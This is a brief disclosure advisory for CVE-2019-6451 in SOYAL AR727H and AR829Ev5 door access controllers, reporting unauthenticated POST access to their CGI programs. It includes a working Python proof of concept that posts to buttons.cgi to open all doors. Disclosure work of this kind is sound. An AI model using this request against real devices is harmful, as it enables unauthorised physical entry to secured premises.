CVE-2019-6451
Timeline
- January 15, 2019 reported to SOAYL
- January 15, 2019 arranged meeting time for further discussions
- January 16, 2019 CVE assigned
Affected Products
- SOYAL-AR727H
- SOYAL-AR829Ev5
Technical Details
On thoses devices, all CGI programs allow unauthenticated POST access.
if you know the proper parameters and format, anyone can make it work
like open the door or insert new account on the device
In the Direct Control tab, you can control the door directly.
replay with Burpsuite or send it by python code below
import requests
response = requests.post('http://IP/buttons.cgi', data={'btn_Node': '255',
'btnOpenAllPulse': '+Action+',
'btn_nameDI0': 'DI0',
'btn_nameDI1': 'DI1',
'btn_nameDI2': 'DI2',
'btn_nameDI3': 'DI3',
'btn_nameDO0': 'RelayOutput0',
'delayDO0':'0',
'btn_nameDO1': 'DO1',
'delayDO1': '0',
'btn_nameDO2': 'DO2',
'delayDO2': '0',
'btn_nameDO3': 'DO3',
'delayDO3': '0'})OPEN SESAME !!!

